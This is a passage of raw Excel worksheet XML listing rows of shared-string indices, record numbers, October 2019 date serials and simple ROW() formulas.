      <c r="G14057" t="s">
        <v>24464</v>
      </c>
    </row>
    <row r="14058" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14058">
        <f t="shared" si="219"/>
        <v>14057</v>
      </c>
      <c r="B14058">
        <v>4057</v>
      </c>
      <c r="C14058" t="s">
        <v>19637</v>
      </c>
      <c r="D14058" s="1">
        <v>43741</v>
      </c>
      <c r="F14058" t="s">
        <v>10526</v>
      </c>
      <c r="G14058" t="s">
        <v>24465</v>
      </c>
    </row>
    <row r="14059" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14059">
        <f t="shared" si="219"/>
        <v>14058</v>
      </c>
      <c r="B14059">
        <v>4058</v>
      </c>
      <c r="C14059" t="s">
        <v>19637</v>
      </c>
      <c r="D14059" s="1">
        <v>43740</v>
      </c>
      <c r="E14059" t="s">
        <v>20873</v>
      </c>
      <c r="F14059" t="s">
        <v>10526</v>
      </c>
      <c r="G14059" t="s">
        <v>24466</v>
      </c>
    </row>
    <row r="14060" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14060">
        <f t="shared" si="219"/>
        <v>14059</v>
      </c>
      <c r="B14060">
        <v>4059</v>
      </c>
      <c r="C14060" t="s">
        <v>19637</v>
      </c>
      <c r="D14060" s="1">
        <v>43756</v>
      </c>
      <c r="E14060" t="s">
        <v>19643</v>
      </c>
      <c r="F14060" t="s">
        <v>10021</v>
      </c>
      <c r="G14060" t="s">
        <v>24467</v>
      </c>
    </row>
    <row r="14061" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14061">
        <f t="shared" si="219"/>
        <v>14060</v>
      </c>
      <c r="B14061">
        <v>4060</v>
      </c>
      <c r="C14061" t="s">
        <v>19637</v>
      </c>
      <c r="D14061" s="1">
        <v>43753</v>
      </c>
      <c r="E14061" t="s">
        <v>19879</v>
      </c>
      <c r="F14061" t="s">
        <v>10021</v>
      </c>
      <c r="G14061" t="s">
        <v>24468</v>
      </c>
    </row>
    <row r="14062" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14062">
        <f t="shared" si="219"/>
        <v>14061</v>
      </c>
      <c r="B14062">
        <v>4061</v>
      </c>
      <c r="C14062" t="s">
        <v>19637</v>
      </c>
      <c r="D14062" s="1">
        <v>43757</v>
      </c>
      <c r="E14062" t="s">
        <v>20944</v>
      </c>
      <c r="F14062" t="s">
        <v>9975</v>
      </c>
      <c r="G14062" t="s">
        <v>24469</v>
      </c>
    </row>
    <row r="14063" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14063">
        <f t="shared" si="219"/>
        <v>14062</v>
      </c>
      <c r="B14063">
        <v>4062</v>
      </c>
      <c r="C14063" t="s">
        <v>19637</v>
      </c>
      <c r="D14063" s="1">
        <v>43745</v>
      </c>
      <c r="F14063" t="s">
        <v>10526</v>
      </c>
      <c r="G14063" t="s">
        <v>24470</v>
      </c>
    </row>
    <row r="14064" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14064">
        <f t="shared" si="219"/>
        <v>14063</v>
      </c>
      <c r="B14064">
        <v>4063</v>
      </c>
      <c r="C14064" t="s">
        <v>19637</v>
      </c>
      <c r="D14064" s="1">
        <v>43743</v>
      </c>
      <c r="E14064" t="s">
        <v>19640</v>
      </c>
      <c r="F14064" t="s">
        <v>9975</v>
      </c>
      <c r="G14064" t="s">
        <v>24471</v>
      </c>
    </row>
    <row r="14065" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14065">
        <f t="shared" si="219"/>
        <v>14064</v>
      </c>
      <c r="B14065">
        <v>4064</v>
      </c>
      <c r="C14065" t="s">
        <v>19637</v>
      </c>
      <c r="D14065" s="1">
        <v>43756</v>
      </c>
      <c r="E14065" t="s">
        <v>19690</v>
      </c>
      <c r="F14065" t="s">
        <v>9978</v>
      </c>
      <c r="G14065" t="s">
        <v>24472</v>
      </c>
    </row>
    <row r="14066" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14066">
        <f t="shared" si="219"/>
        <v>14065</v>
      </c>
      <c r="B14066">
        <v>4065</v>
      </c>
      <c r="C14066" t="s">
        <v>19637</v>
      </c>
      <c r="D14066" s="1">
        <v>43739</v>
      </c>
      <c r="E14066" t="s">
        <v>24473</v>
      </c>
      <c r="F14066" t="s">
        <v>10021</v>
      </c>
      <c r="G14066" t="s">
        <v>24474</v>
      </c>
    </row>
    <row r="14067" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14067">
        <f t="shared" si="219"/>
        <v>14066</v>
      </c>
      <c r="B14067">
        <v>4066</v>
      </c>
      <c r="C14067" t="s">
        <v>19637</v>
      </c>
      <c r="D14067" s="1">
        <v>43740</v>
      </c>
      <c r="E14067" t="s">
        <v>24475</v>
      </c>
      <c r="F14067" t="s">
        <v>9978</v>
      </c>
      <c r="G14067" t="s">
        <v>24476</v>
      </c>
    </row>
    <row r="14068" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14068">
        <f t="shared" si="219"/>
        <v>14067</v>
      </c>
      <c r="B14068">
        <v>4067</v>
      </c>
      <c r="C14068" t="s">
        <v>19637</v>
      </c>
      <c r="D14068" s="1">
        <v>43745</v>
      </c>
      <c r="E14068" t="s">
        <v>19680</v>
      </c>
      <c r="F14068" t="s">
        <v>10021</v>
      </c>
      <c r="G14068" t="s">
        <v>24477</v>
      </c>
    </row>
    <row r="14069" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14069">
        <f t="shared" si="219"/>
        <v>14068</v>
      </c>
      <c r="B14069">
        <v>4068</v>
      </c>
      <c r="C14069" t="s">
        <v>19637</v>
      </c>
      <c r="D14069" s="1">
        <v>43740</v>
      </c>
      <c r="F14069" t="s">
        <v>10526</v>
      </c>
      <c r="G14069" t="s">
        <v>24478</v>
      </c>
    </row>
    <row r="14070" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14070">
        <f t="shared" si="219"/>
        <v>14069</v>
      </c>
      <c r="B14070">
        <v>4069</v>
      </c>
      <c r="C14070" t="s">
        <v>19637</v>
      </c>
      <c r="D14070" s="1">
        <v>43741</v>
      </c>
      <c r="E14070" t="s">
        <v>19640</v>
      </c>
      <c r="F14070" t="s">
        <v>10021</v>
      </c>
      <c r="G14070" t="s">
        <v>24479</v>
      </c>
    </row>
    <row r="14071" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14071">
        <f t="shared" si="219"/>
        <v>14070</v>
      </c>
      <c r="B14071">
        <v>4070</v>
      </c>
      <c r="C14071" t="s">
        <v>19637</v>
      </c>
      <c r="D14071" s="1">
        <v>43754</v>
      </c>
      <c r="E14071" t="s">
        <v>24480</v>
      </c>
      <c r="F14071" t="s">
        <v>10526</v>
      </c>
      <c r="G14071" t="s">
        <v>24481</v>
      </c>
    </row>
    <row r="14072" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14072">
        <f t="shared" si="219"/>
        <v>14071</v>
      </c>
      <c r="B14072">
        <v>4071</v>
      </c>
      <c r="C14072" t="s">
        <v>19637</v>
      </c>
      <c r="D14072" s="1">
        <v>43741</v>
      </c>
      <c r="F14072" t="s">
        <v>10526</v>
      </c>
      <c r="G14072" t="s">
        <v>24482</v>
      </c>
    </row>
    <row r="14073" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14073">
        <f t="shared" si="219"/>
        <v>14072</v>
      </c>
      <c r="B14073">
        <v>4072</v>
      </c>
      <c r="C14073" t="s">
        <v>19637</v>
      </c>
      <c r="D14073" s="1">
        <v>43747</v>
      </c>
      <c r="E14073" t="s">
        <v>24483</v>
      </c>
      <c r="F14073" t="s">
        <v>10526</v>
      </c>
      <c r="G14073" t="s">
        <v>24484</v>
      </c>
    </row>
    <row r="14074" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14074">
        <f t="shared" si="219"/>
        <v>14073</v>
      </c>
      <c r="B14074">
        <v>4073</v>
      </c>
      <c r="C14074" t="s">
        <v>19637</v>
      </c>
      <c r="D14074" s="1">
        <v>43746</v>
      </c>
      <c r="F14074" t="s">
        <v>10526</v>
      </c>
      <c r="G14074" t="s">
        <v>24485</v>
      </c>
    </row>
    <row r="14075" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14075">
        <f t="shared" si="219"/>
        <v>14074</v>
      </c>
      <c r="B14075">
        <v>4074</v>
      </c>
      <c r="C14075" t="s">
        <v>19637</v>
      </c>
      <c r="D14075" s="1">
        <v>43750</v>
      </c>
      <c r="E14075" t="s">
        <v>19640</v>
      </c>
      <c r="F14075" t="s">
        <v>9975</v>
      </c>
      <c r="G14075" t="s">
        <v>24486</v>
      </c>
    </row>
    <row r="14076" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14076">
        <f t="shared" si="219"/>
        <v>14075</v>
      </c>
      <c r="B14076">
        <v>4075</v>
      </c>
      <c r="C14076" t="s">
        <v>19637</v>
      </c>
      <c r="D14076" s="1">
        <v>43755</v>
      </c>
      <c r="E14076" t="s">
        <v>19640</v>
      </c>
      <c r="F14076" t="s">
        <v>9975</v>
      </c>
      <c r="G14076" t="s">
        <v>24487</v>
      </c>
    </row>
    <row r="14077" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14077">
        <f t="shared" si="219"/>
        <v>14076</v>
      </c>
      <c r="B14077">
        <v>4076</v>
      </c>
      <c r="C14077" t="s">
        <v>19637</v>
      </c>
      <c r="D14077" s="1">
        <v>43756</v>
      </c>
      <c r="E14077" t="s">
        <v>20995</v>
      </c>
      <c r="F14077" t="s">
        <v>9975</v>
      </c>
      <c r="G14077" t="s">
        <v>24488</v>
      </c>
    </row>
    <row r="14078" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14078">
        <f t="shared" si="219"/>
        <v>14077</v>
      </c>
      <c r="B14078">
        <v>4077</v>
      </c>
      <c r="C14078" t="s">
        <v>19637</v>
      </c>
      <c r="D14078" s="1">
        <v>43756</v>
      </c>
      <c r="E14078" t="s">
        <v>19650</v>
      </c>
      <c r="F14078" t="s">
        <v>10021</v>
      </c>
      <c r="G14078" t="s">
        <v>24489</v>
      </c>
    </row>
    <row r="14079" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14079">
        <f t="shared" si="219"/>
        <v>14078</v>
      </c>
      <c r="B14079">
        <v>4078</v>
      </c>
      <c r="C14079" t="s">
        <v>19637</v>
      </c>
      <c r="D14079" s="1">
        <v>43753</v>
      </c>
      <c r="E14079" t="s">
        <v>24490</v>
      </c>
      <c r="F14079" t="s">
        <v>9978</v>
      </c>
      <c r="G14079" t="s">
        <v>24491</v>
      </c>
    </row>
    <row r="14080" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14080">
        <f t="shared" si="219"/>
        <v>14079</v>
      </c>
      <c r="B14080">
        <v>4079</v>
      </c>
      <c r="C14080" t="s">
        <v>19637</v>
      </c>
      <c r="D14080" s="1">
        <v>43752</v>
      </c>
      <c r="E14080" t="s">
        <v>19896</v>
      </c>
      <c r="F14080" t="s">
        <v>10021</v>
      </c>
      <c r="G14080" t="s">
        <v>24492</v>
      </c>
    </row>
    <row r="14081" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14081">
        <f t="shared" si="219"/>
        <v>14080</v>
      </c>
      <c r="B14081">
        <v>4080</v>
      </c>
      <c r="C14081" t="s">
        <v>19637</v>
      </c>
      <c r="D14081" s="1">
        <v>43746</v>
      </c>
      <c r="E14081" t="s">
        <v>24493</v>
      </c>
      <c r="F14081" t="s">
        <v>9978</v>
      </c>
      <c r="G14081" t="s">
        <v>24494</v>
      </c>
    </row>
    <row r="14082" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14082">
        <f t="shared" si="219"/>
        <v>14081</v>
      </c>
      <c r="B14082">
        <v>4081</v>
      </c>
      <c r="C14082" t="s">
        <v>19637</v>
      </c>
      <c r="D14082" s="1">
        <v>43755</v>
      </c>
      <c r="E14082" t="s">
        <v>19655</v>
      </c>
      <c r="F14082" t="s">
        <v>9975</v>
      </c>
    </row>
    <row r="14083" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14083">
        <f t="shared" ref="A14083:A14146" si="220">+ROW(A14082)</f>
        <v>14082</v>
      </c>
      <c r="B14083">
        <v>4082</v>
      </c>
      <c r="C14083" t="s">
        <v>19637</v>
      </c>
      <c r="D14083" s="1">
        <v>43741</v>
      </c>
      <c r="F14083" t="s">
        <v>10526</v>
      </c>
      <c r="G14083" t="s">
        <v>24495</v>
      </c>
    </row>
    <row r="14084" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14084">
        <f t="shared" si="220"/>
        <v>14083</v>
      </c>
      <c r="B14084">
        <v>4083</v>
      </c>
      <c r="C14084" t="s">
        <v>19637</v>
      </c>
      <c r="D14084" s="1">
        <v>43745</v>
      </c>
      <c r="E14084" t="s">
        <v>22635</v>
      </c>
      <c r="F14084" t="s">
        <v>10526</v>
      </c>
      <c r="G14084" t="s">
        <v>24496</v>
      </c>
    </row>
    <row r="14085" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14085">
        <f t="shared" si="220"/>
        <v>14084</v>
      </c>
      <c r="B14085">
        <v>4084</v>
      </c>
      <c r="C14085" t="s">
        <v>19637</v>
      </c>
      <c r="D14085" s="1">
        <v>43755</v>
      </c>
      <c r="E14085" t="s">
        <v>19645</v>
      </c>
      <c r="F14085" t="s">
        <v>9975</v>
      </c>
      <c r="G14085" t="s">
        <v>24497</v>
      </c>
    </row>
    <row r="14086" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14086">
        <f t="shared" si="220"/>
        <v>14085</v>
      </c>
      <c r="B14086">
        <v>4085</v>
      </c>
      <c r="C14086" t="s">
        <v>19637</v>
      </c>
      <c r="D14086" s="1">
        <v>43740</v>
      </c>
      <c r="F14086" t="s">
        <v>10526</v>
      </c>
      <c r="G14086" t="s">
        <v>24498</v>
      </c>
    </row>
    <row r="14087" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14087">
        <f t="shared" si="220"/>
        <v>14086</v>
      </c>
      <c r="B14087">
        <v>4086</v>
      </c>
      <c r="C14087" t="s">
        <v>19637</v>
      </c>
      <c r="D14087" s="1">
        <v>43755</v>
      </c>
      <c r="E14087" t="s">
        <v>19640</v>
      </c>
      <c r="F14087" t="s">
        <v>9975</v>
      </c>
      <c r="G14087" t="s">
        <v>24499</v>
      </c>
    </row>
    <row r="14088" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14088">
        <f t="shared" si="220"/>
        <v>14087</v>
      </c>
      <c r="B14088">
        <v>4087</v>
      </c>
      <c r="C14088" t="s">
        <v>19637</v>
      </c>
      <c r="D14088" s="1">
        <v>43742</v>
      </c>
      <c r="E14088" t="s">
        <v>20735</v>
      </c>
      <c r="F14088" t="s">
        <v>9978</v>
      </c>
      <c r="G14088" t="s">
        <v>24500</v>
      </c>
    </row>
    <row r="14089" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14089">
        <f t="shared" si="220"/>
        <v>14088</v>
      </c>
      <c r="B14089">
        <v>4088</v>
      </c>
      <c r="C14089" t="s">
        <v>19637</v>
      </c>
      <c r="D14089" s="1">
        <v>43753</v>
      </c>
      <c r="E14089" t="s">
        <v>19640</v>
      </c>
      <c r="F14089" t="s">
        <v>10021</v>
      </c>
      <c r="G14089" t="s">
        <v>24501</v>
      </c>
    </row>
    <row r="14090" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14090">
        <f t="shared" si="220"/>
        <v>14089</v>
      </c>
      <c r="B14090">
        <v>4089</v>
      </c>
      <c r="C14090" t="s">
        <v>19637</v>
      </c>
      <c r="D14090" s="1">
        <v>43753</v>
      </c>
      <c r="E14090" t="s">
        <v>19640</v>
      </c>
      <c r="F14090" t="s">
        <v>9975</v>
      </c>
      <c r="G14090" t="s">
        <v>24502</v>
      </c>
    </row>
    <row r="14091" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14091">
        <f t="shared" si="220"/>
        <v>14090</v>
      </c>
      <c r="B14091">
        <v>4090</v>
      </c>
      <c r="C14091" t="s">
        <v>19637</v>
      </c>
      <c r="D14091" s="1">
        <v>43740</v>
      </c>
      <c r="E14091" t="s">
        <v>19687</v>
      </c>
      <c r="F14091" t="s">
        <v>10021</v>
      </c>
      <c r="G14091" t="s">
        <v>24503</v>
      </c>
    </row>
    <row r="14092" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14092">
        <f t="shared" si="220"/>
        <v>14091</v>
      </c>
      <c r="B14092">
        <v>4091</v>
      </c>
      <c r="C14092" t="s">
        <v>19637</v>
      </c>
      <c r="D14092" s="1">
        <v>43739</v>
      </c>
      <c r="E14092" t="s">
        <v>20577</v>
      </c>
      <c r="F14092" t="s">
        <v>10021</v>
      </c>
      <c r="G14092" t="s">
        <v>24504</v>
      </c>
    </row>
    <row r="14093" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14093">
        <f t="shared" si="220"/>
        <v>14092</v>
      </c>
      <c r="B14093">
        <v>4092</v>
      </c>
      <c r="C14093" t="s">
        <v>19637</v>
      </c>
      <c r="D14093" s="1">
        <v>43755</v>
      </c>
      <c r="E14093" t="s">
        <v>21895</v>
      </c>
      <c r="F14093" t="s">
        <v>10526</v>
      </c>
      <c r="G14093" t="s">
        <v>24505</v>
      </c>
    </row>
    <row r="14094" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14094">
        <f t="shared" si="220"/>
        <v>14093</v>
      </c>
      <c r="B14094">
        <v>4093</v>
      </c>
      <c r="C14094" t="s">
        <v>19637</v>
      </c>
      <c r="D14094" s="1">
        <v>43757</v>
      </c>
      <c r="E14094" t="s">
        <v>19640</v>
      </c>
      <c r="F14094" t="s">
        <v>9975</v>
      </c>
      <c r="G14094" t="s">
        <v>24506</v>
      </c>
    </row>
    <row r="14095" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14095">
        <f t="shared" si="220"/>
        <v>14094</v>
      </c>
      <c r="B14095">
        <v>4094</v>
      </c>
      <c r="C14095" t="s">
        <v>19637</v>
      </c>
      <c r="D14095" s="1">
        <v>43751</v>
      </c>
      <c r="E14095" t="s">
        <v>24507</v>
      </c>
      <c r="F14095" t="s">
        <v>10526</v>
      </c>
      <c r="G14095" t="s">
        <v>24508</v>
      </c>
    </row>
    <row r="14096" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14096">
        <f t="shared" si="220"/>
        <v>14095</v>
      </c>
      <c r="B14096">
        <v>4095</v>
      </c>
      <c r="C14096" t="s">
        <v>19637</v>
      </c>
      <c r="D14096" s="1">
        <v>43754</v>
      </c>
      <c r="E14096" t="s">
        <v>19650</v>
      </c>
      <c r="F14096" t="s">
        <v>10021</v>
      </c>
      <c r="G14096" t="s">
        <v>24509</v>
      </c>
    </row>
    <row r="14097" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14097">
        <f t="shared" si="220"/>
        <v>14096</v>
      </c>
      <c r="B14097">
        <v>4096</v>
      </c>
      <c r="C14097" t="s">
        <v>19637</v>
      </c>
      <c r="D14097" s="1">
        <v>43747</v>
      </c>
      <c r="E14097" t="s">
        <v>19736</v>
      </c>
      <c r="F14097" t="s">
        <v>10526</v>
      </c>
      <c r="G14097" t="s">
        <v>24510</v>
      </c>
    </row>
    <row r="14098" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14098">
        <f t="shared" si="220"/>
        <v>14097</v>
      </c>
      <c r="B14098">
        <v>4097</v>
      </c>
      <c r="C14098" t="s">
        <v>19637</v>
      </c>
      <c r="D14098" s="1">
        <v>43741</v>
      </c>
      <c r="E14098" t="s">
        <v>19668</v>
      </c>
      <c r="F14098" t="s">
        <v>9978</v>
      </c>
      <c r="G14098" t="s">
        <v>24511</v>
      </c>
    </row>
    <row r="14099" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14099">
        <f t="shared" si="220"/>
        <v>14098</v>
      </c>
      <c r="B14099">
        <v>4098</v>
      </c>
      <c r="C14099" t="s">
        <v>19637</v>
      </c>
      <c r="D14099" s="1">
        <v>43743</v>
      </c>
      <c r="F14099" t="s">
        <v>10021</v>
      </c>
      <c r="G14099" t="s">
        <v>19708</v>
      </c>
    </row>
    <row r="14100" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14100">
        <f t="shared" si="220"/>
        <v>14099</v>
      </c>
      <c r="B14100">
        <v>4099</v>
      </c>
      <c r="C14100" t="s">
        <v>19637</v>
      </c>
      <c r="D14100" s="1">
        <v>43750</v>
      </c>
      <c r="E14100" t="s">
        <v>19640</v>
      </c>
      <c r="F14100" t="s">
        <v>10021</v>
      </c>
      <c r="G14100" t="s">
        <v>24512</v>
      </c>
    </row>
    <row r="14101" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14101">
        <f t="shared" si="220"/>
        <v>14100</v>
      </c>
      <c r="B14101">
        <v>4100</v>
      </c>
      <c r="C14101" t="s">
        <v>19637</v>
      </c>
      <c r="D14101" s="1">
        <v>43749</v>
      </c>
      <c r="E14101" t="s">
        <v>19672</v>
      </c>
      <c r="F14101" t="s">
        <v>10021</v>
      </c>
      <c r="G14101" t="s">
        <v>24513</v>
      </c>
    </row>
    <row r="14102" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14102">
        <f t="shared" si="220"/>
        <v>14101</v>
      </c>
      <c r="B14102">
        <v>4101</v>
      </c>
      <c r="C14102" t="s">
        <v>19637</v>
      </c>
      <c r="D14102" s="1">
        <v>43756</v>
      </c>
      <c r="E14102" t="s">
        <v>19648</v>
      </c>
      <c r="F14102" t="s">
        <v>10021</v>
      </c>
      <c r="G14102" t="s">
        <v>24514</v>
      </c>
    </row>
    <row r="14103" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14103">
        <f t="shared" si="220"/>
        <v>14102</v>
      </c>
      <c r="B14103">
        <v>4102</v>
      </c>
      <c r="C14103" t="s">
        <v>19637</v>
      </c>
      <c r="D14103" s="1">
        <v>43752</v>
      </c>
      <c r="F14103" t="s">
        <v>9978</v>
      </c>
      <c r="G14103" t="s">
        <v>24515</v>
      </c>
    </row>
    <row r="14104" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14104">
        <f t="shared" si="220"/>
        <v>14103</v>
      </c>
      <c r="B14104">
        <v>4103</v>
      </c>
      <c r="C14104" t="s">
        <v>19637</v>
      </c>
      <c r="D14104" s="1">
        <v>43740</v>
      </c>
      <c r="E14104" t="s">
        <v>19640</v>
      </c>
      <c r="F14104" t="s">
        <v>9975</v>
      </c>
      <c r="G14104" t="s">
        <v>24516</v>
      </c>
    </row>
    <row r="14105" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14105">
        <f t="shared" si="220"/>
        <v>14104</v>
      </c>
      <c r="B14105">
        <v>4104</v>
      </c>
      <c r="C14105" t="s">
        <v>19637</v>
      </c>
      <c r="D14105" s="1">
        <v>43745</v>
      </c>
      <c r="F14105" t="s">
        <v>10526</v>
      </c>
      <c r="G14105" t="s">
        <v>24517</v>
      </c>
    </row>
    <row r="14106" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14106">
        <f t="shared" si="220"/>
        <v>14105</v>
      </c>
      <c r="B14106">
        <v>4105</v>
      </c>
      <c r="C14106" t="s">
        <v>19637</v>
      </c>
      <c r="D14106" s="1">
        <v>43745</v>
      </c>
      <c r="F14106" t="s">
        <v>10526</v>
      </c>
      <c r="G14106" t="s">
        <v>24518</v>
      </c>
    </row>
    <row r="14107" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14107">
        <f t="shared" si="220"/>
        <v>14106</v>
      </c>
      <c r="B14107">
        <v>4106</v>
      </c>
      <c r="C14107" t="s">
        <v>19637</v>
      </c>
      <c r="D14107" s="1">
        <v>43739</v>
      </c>
      <c r="E14107" t="s">
        <v>19640</v>
      </c>
      <c r="F14107" t="s">
        <v>10526</v>
      </c>
      <c r="G14107" t="s">
        <v>24519</v>
      </c>
    </row>
    <row r="14108" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14108">
        <f t="shared" si="220"/>
        <v>14107</v>
      </c>
      <c r="B14108">
        <v>4107</v>
      </c>
      <c r="C14108" t="s">
        <v>19637</v>
      </c>
      <c r="D14108" s="1">
        <v>43748</v>
      </c>
      <c r="F14108" t="s">
        <v>10526</v>
      </c>
      <c r="G14108" t="s">
        <v>24520</v>
      </c>
    </row>
    <row r="14109" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14109">
        <f t="shared" si="220"/>
        <v>14108</v>
      </c>
      <c r="B14109">
        <v>4108</v>
      </c>
      <c r="C14109" t="s">
        <v>19637</v>
      </c>
      <c r="D14109" s="1">
        <v>43749</v>
      </c>
      <c r="E14109" t="s">
        <v>23671</v>
      </c>
      <c r="F14109" t="s">
        <v>10021</v>
      </c>
      <c r="G14109" t="s">
        <v>24521</v>
      </c>
    </row>
    <row r="14110" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14110">
        <f t="shared" si="220"/>
        <v>14109</v>
      </c>
      <c r="B14110">
        <v>4109</v>
      </c>
      <c r="C14110" t="s">
        <v>19637</v>
      </c>
      <c r="D14110" s="1">
        <v>43747</v>
      </c>
      <c r="E14110" t="s">
        <v>19640</v>
      </c>
      <c r="F14110" t="s">
        <v>10021</v>
      </c>
      <c r="G14110" t="s">
        <v>24522</v>
      </c>
    </row>
    <row r="14111" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14111">
        <f t="shared" si="220"/>
        <v>14110</v>
      </c>
      <c r="B14111">
        <v>4110</v>
      </c>
      <c r="C14111" t="s">
        <v>19637</v>
      </c>
      <c r="D14111" s="1">
        <v>43756</v>
      </c>
      <c r="F14111" t="s">
        <v>10526</v>
      </c>
      <c r="G14111" t="s">
        <v>24523</v>
      </c>
    </row>
    <row r="14112" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14112">
        <f t="shared" si="220"/>
        <v>14111</v>
      </c>
      <c r="B14112">
        <v>4111</v>
      </c>
      <c r="C14112" t="s">
        <v>19637</v>
      </c>
      <c r="D14112" s="1">
        <v>43746</v>
      </c>
      <c r="E14112" t="s">
        <v>19690</v>
      </c>
      <c r="F14112" t="s">
        <v>9978</v>
      </c>
      <c r="G14112" t="s">
        <v>24524</v>
      </c>
    </row>
    <row r="14113" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14113">
        <f t="shared" si="220"/>
        <v>14112</v>
      </c>
      <c r="B14113">
        <v>4112</v>
      </c>
      <c r="C14113" t="s">
        <v>19637</v>
      </c>
      <c r="D14113" s="1">
        <v>43752</v>
      </c>
      <c r="F14113" t="s">
        <v>10021</v>
      </c>
      <c r="G14113" t="s">
        <v>24525</v>
      </c>
    </row>
    <row r="14114" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14114">
        <f t="shared" si="220"/>
        <v>14113</v>
      </c>
      <c r="B14114">
        <v>4113</v>
      </c>
      <c r="C14114" t="s">
        <v>19637</v>
      </c>
      <c r="D14114" s="1">
        <v>43752</v>
      </c>
      <c r="E14114" t="s">
        <v>19640</v>
      </c>
      <c r="F14114" t="s">
        <v>9975</v>
      </c>
      <c r="G14114" t="s">
        <v>24526</v>
      </c>
    </row>
    <row r="14115" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14115">
        <f t="shared" si="220"/>
        <v>14114</v>
      </c>
      <c r="B14115">
        <v>4114</v>
      </c>
      <c r="C14115" t="s">
        <v>19637</v>
      </c>
      <c r="D14115" s="1">
        <v>43754</v>
      </c>
      <c r="E14115" t="s">
        <v>24527</v>
      </c>
      <c r="F14115" t="s">
        <v>10021</v>
      </c>
      <c r="G14115" t="s">
        <v>24528</v>
      </c>
    </row>
    <row r="14116" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14116">
        <f t="shared" si="220"/>
        <v>14115</v>
      </c>
      <c r="B14116">
        <v>4115</v>
      </c>
      <c r="C14116" t="s">
        <v>19637</v>
      </c>
      <c r="D14116" s="1">
        <v>43755</v>
      </c>
      <c r="F14116" t="s">
        <v>10526</v>
      </c>
      <c r="G14116" t="s">
        <v>24529</v>
      </c>
    </row>
    <row r="14117" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14117">
        <f t="shared" si="220"/>
        <v>14116</v>
      </c>
      <c r="B14117">
        <v>4116</v>
      </c>
      <c r="C14117" t="s">
        <v>19637</v>
      </c>
      <c r="D14117" s="1">
        <v>43745</v>
      </c>
      <c r="E14117" t="s">
        <v>19640</v>
      </c>
      <c r="F14117" t="s">
        <v>9975</v>
      </c>
      <c r="G14117" t="s">
        <v>24530</v>
      </c>
    </row>
    <row r="14118" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14118">
        <f t="shared" si="220"/>
        <v>14117</v>
      </c>
      <c r="B14118">
        <v>4117</v>
      </c>
      <c r="C14118" t="s">
        <v>19637</v>
      </c>
      <c r="D14118" s="1">
        <v>43754</v>
      </c>
      <c r="E14118" t="s">
        <v>22901</v>
      </c>
      <c r="F14118" t="s">
        <v>9978</v>
      </c>
      <c r="G14118" t="s">
        <v>24531</v>
      </c>
    </row>
    <row r="14119" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14119">
        <f t="shared" si="220"/>
        <v>14118</v>
      </c>
      <c r="B14119">
        <v>4118</v>
      </c>
      <c r="C14119" t="s">
        <v>19637</v>
      </c>
      <c r="D14119" s="1">
        <v>43754</v>
      </c>
      <c r="E14119" t="s">
        <v>19896</v>
      </c>
      <c r="F14119" t="s">
        <v>10021</v>
      </c>
      <c r="G14119" t="s">
        <v>24532</v>
      </c>
    </row>
    <row r="14120" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14120">
        <f t="shared" si="220"/>
        <v>14119</v>
      </c>
      <c r="B14120">
        <v>4119</v>
      </c>
      <c r="C14120" t="s">
        <v>19637</v>
      </c>
      <c r="D14120" s="1">
        <v>43739</v>
      </c>
